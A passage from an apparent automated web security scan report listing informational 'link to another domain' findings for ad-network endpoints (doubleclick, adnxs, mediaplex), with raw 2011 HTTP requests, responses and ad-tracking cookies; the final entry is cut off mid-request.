<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&BT_TRF=49121&app=UNSOL&sc=4T4ZJW71&m=4CJ5MDR210W&langId=EN&siteId=CB&B=M&screenID=3000&uc=AQV&t=t&link=Consumer_631523784">here</A>
...[SNIP]...

15.53. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000015500165&pubid=21000000000112308&mid=11263fc820119c061b17058840e528

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631523794

Request

GET /gan_click?lid=41000000015500165&pubid=21000000000112308&mid=11263fc820119c061b17058840e528 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=1477&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631523794
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 10:40:39 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631523794">here</A>
...[SNIP]...

15.54. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000030423433&pubid=21000000000112308&mid=11221f3a201102068b1705d240ae37&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11221f3a201102068b1705d240ae37

The response contains the following link to another domain:

http://www.capitalone.com/creditcards/redirects/34.php?external_id=GAN_ZZ10106002_USCGAN_j30423433k112308_631523960

Request

GET /gan_click?lid=41000000030423433&pubid=21000000000112308&mid=11221f3a201102068b1705d240ae37&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11221f3a201102068b1705d240ae37 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105049&pg=1477&pgpos=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://www.capitalone.com/creditcards/redirects/34.php?external_id=GAN_ZZ10106002_USCGAN_j30423433k112308_631523960
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 10:40:40 GMT
Server: ads-affiliate-network-event-server
Content-Length: 312
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.capitalone.com/creditcards/redirects/34.php?external_id=GAN_ZZ10106002_USCGAN_j30423433k112308_631523960">here</A>
...[SNIP]...

15.55. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000032191799&pubid=21000000000112308&mid=111115b420113e068817052b40de13

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631523949

Request

GET /gan_click?lid=41000000032191799&pubid=21000000000112308&mid=111115b420113e068817052b40de13 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631523949
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 10:40:19 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631523949">here</A>
...[SNIP]...

15.56. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000030703945&pubid=21000000000112308&mid=11229c4f20117a0653170528407c13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11229c4f20117a0653170528407c13

The response contains the following link to another domain:

http://www.capitalone.com/creditcards/redirects/08.php?external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523780

Request

GET /gan_click?lid=41000000030703945&pubid=21000000000112308&mid=11229c4f20117a0653170528407c13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11229c4f20117a0653170528407c13 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105064&pg=1477&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://www.capitalone.com/creditcards/redirects/08.php?external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523780
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 10:40:16 GMT
Server: ads-affiliate-network-event-server
Content-Length: 312
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.capitalone.com/creditcards/redirects/08.php?external_id=GAN_ZZ10106006_USCGAN_j30703945k112308_631523780">here</A>
...[SNIP]...

15.57. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000033962194&pubid=21000000000112308&mid=1121a87c201116064d1705ca40ef36&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1121a87c201116064d1705ca40ef36

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6&BT_TRF=47895&app=UNSOL&siteId=CB&langId=EN&sc=1NMZA5W1&B=C&m=3CJ5MDR0300&uc=AJJ&t=t&naInd=M&link=Consumer_631524426

Request

GET /gan_click?lid=41000000033962194&pubid=21000000000112308&mid=1121a87c201116064d1705ca40ef36&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1121a87c201116064d1705ca40ef36 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145660&pg=1477&pgpos=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6&BT_TRF=47895&app=UNSOL&siteId=CB&langId=EN&sc=1NMZA5W1&B=C&m=3CJ5MDR0300&uc=AJJ&t=t&naInd=M&link=Consumer_631524426
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 10:40:39 GMT
Server: ads-affiliate-network-event-server
Content-Length: 473
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6&BT_TRF=47895&app=UNSOL&siteId=CB&langId=EN&sc=1NMZA5W1&B=C&m=3CJ5MDR0300&uc=AJJ&t=t&naInd=M&link=Consumer_631524426">here</A>
...[SNIP]...

15.58. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000032191799&pubid=21000000000112308&mid=1117dffc2011e8065b1705fd423724

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631524242

Request

GET /gan_click?lid=41000000032191799&pubid=21000000000112308&mid=1117dffc2011e8065b1705fd423724 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631524242
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 10:42:27 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631524242">here</A>
...[SNIP]...

15.59. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000015500167&pubid=21000000000112308&mid=112263b62011f106e31705c9403718

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631523782

Request

GET /gan_click?lid=41000000015500167&pubid=21000000000112308&mid=112263b62011f106e31705c9403718 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=1477&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631523782
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 10:40:23 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631523782">here</A>
...[SNIP]...

15.60. http://gan.doubleclick.net/gan_impression previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_impression

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_impression?lid=41000000030310791&pubid=21000000000293450

The response contains the following link to another domain:

http://affiliate.2mdn.net/media/21000000000247086/0/88000000000224923.gif

Request

GET /gan_impression?lid=41000000030310791&pubid=21000000000293450 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://affiliate.2mdn.net/media/21000000000247086/0/88000000000224923.gif
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 16 Jun 2011 13:08:16 GMT
Server: ads-affiliate-network-event-server
Content-Length: 270
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://affiliate.2mdn.net/media/21000000000247086/0/88000000000224923.gif">here</A>
...[SNIP]...

15.61. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf%3Ft=1308241078986%26tz=300%26m=0%26hu=%26ht=js%26hp=0%26fo=%26url=UniversalAudiencePlatform23.com%26refer=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860&inv_code=1457934&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1457934%26r%3D0%26_salt%3D1248176818%26u%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308241078986%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%26u%3Dhttp%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

The response contains the following link to another domain:

http://pixel.quantserve.com/seg/r;a=p-6cp0NSw2i2sSA;redirect=http://ib.adnxs.com/seg?add_code=!qcsegs&member=672&t=2

Request

GET /ptj?member=514&size=300x250&referrer=http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf%3Ft=1308241078986%26tz=300%26m=0%26hu=%26ht=js%26hp=0%26fo=%26url=UniversalAudiencePlatform23.com%26refer=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860&inv_code=1457934&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1457934%26r%3D0%26_salt%3D1248176818%26u%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308241078986%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%26u%3Dhttp%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308241078986&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; __ar_v4=%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A1%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1; anj=Kfw)l=m<8a)J710+6hRTeG6Ab(183-:5Cd#%Y@*]^0^-a+UCzh3c3>2Do'RZSxTS/D'mMvNsFx#Q7$`t:ECVv9GZ1LFlXDK?%d)mo7qW!rx7IawU`IIpN%zS$wi[I'ta#fw6p41`ZP=a)74u+k4Ib8s.:$[fi[+/^pZ@yq+d(aL`vZ8ixn[-1MA2@UQG'a^F=4%G#s-2C=cJqtbcmUX1Y2P(Sn`.Jr[_Quw65Z=q:ePRSM2kKYCQBWY!E-*YItQnAAl!nQh8ynLwIHdJ+3RObi:/hP*hUIrAO5+v=1y6ZmUr#*4fR+OcF+6Yl`_VH4Oj=UY8lj#?%wqt<gZq=0lcH$EAswp9r>lL^$xT+bkq%OvCo7@*6yb:3z7]B)X0K$BWh=hB3(h%<rrXz>ka]/+pZvbK.Rv09)Tuymg2dRb6jS<D%:eF:N@w8.3idO]AkU$LYb_Lm*R!)c`L?t6+/@zj`6=?D2)bZ#i$bstu!'uA33uGf*jKx-rgGQT_ESdxVE+:W8iDg89Gl/q*h6/20QkR`SViXN9zP=2(T-XCoef_Halvq.NLcPC+9dK+-]x%iedv71(oD#<7W43RhqsxdBPv'q0l<*l/_*ILWapp7D-x9sV0^!n<CcYl(SlUko/dqu^abIzgUqX#vJ; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIx6EDEAoYAiACKAIwvNno7wQQvNno7wQYAQ..; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lByDua)J710aPA0[:Pu_J9:BG^`l@=.O6Gp#_sLmr]hz%=_O[/t[y>fUSxS0CGsaUK#rr8E)Th5x@$E8w(gtkK?74:u#ZqW#kqC4rj!yxxuRSuPr'.3M+jk`Ehf(+Xu%LH<lL3_P-OT9c_(cUy1yAy%=`3rYunOd?h)8FQbl/2nq2-.O%5f#AL5e9eDuVn3i!!71kCd^Sv2suc5ghUxN^QPXb*W2kM/XS`nF_/v2`h4JKyyC81q5QRSl-_(%H21((wr>r%##Q>*IS>+19R'$K7DKdacc!KwMI4lk%78<(xzs%F^f?%vsX_a4bTwE3_!cKHPcv6^aPk:]+ZRqfWAdnwT(:>X>AFxEO5LU)NF:pKfN4+J-sVzkSftWr+m9LP01itX*3$2OYo4IRnj!)/HyN3C0FBv)d%TYL_[Wq[xFkr0u'C-b:Uufq7gT[7zyceD#`y!9^/@:Kf/@%JzVPS93$%TAfA'@r1nPs99WWB^ydwW]kV?_w#fWgKTQ.*-s1Rs#Gc(:vxV87q_bXUQaUy%G>G$-waWzeLjDEb*SEaWwv*jbDIMX(WG'7RS..jinLwKH^9`DN)tn*KtHiHDx0]'wh@u5tnA^9`rL/P$Mv83obr!B[KNoG=X@-'av%5I8Mk@PzWgM1nJl*VfNVhGccatm]20$^Q; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 16 Jun 2011 16:18:04 GMT
Content-Length: 767

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=&Z=300x250&s=1457934&r=0&_salt=1248176818&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2F
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://pixel.quantserve.com/seg/r;a=p-6cp0NSw2i2sSA;redirect=http://ib.adnxs.com/seg?add_code=!qcsegs&member=672&t=2" width="1" height="1"/>');

15.62. http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/14302/119028/Selector_300x250.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/14302/119028/Selector_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D7117460224&mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=&placementid=14302119028289010&

The response contains the following link to another domain:

http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=http://altfarm.mediaplex.com/ad/ck/14302-119028-28901-0?mpt=7117460224

Request

GET /content/0/14302/119028/Selector_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-0%3Fmpt%3D7117460224&mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/cstr=83985251=_4dfa4d78,7117460224,768033^951514^1183^0,1_/xsxdata=$XSXDATA/bnum=83985251/optn=64?trg=&placementid=14302119028289010& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249463404&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
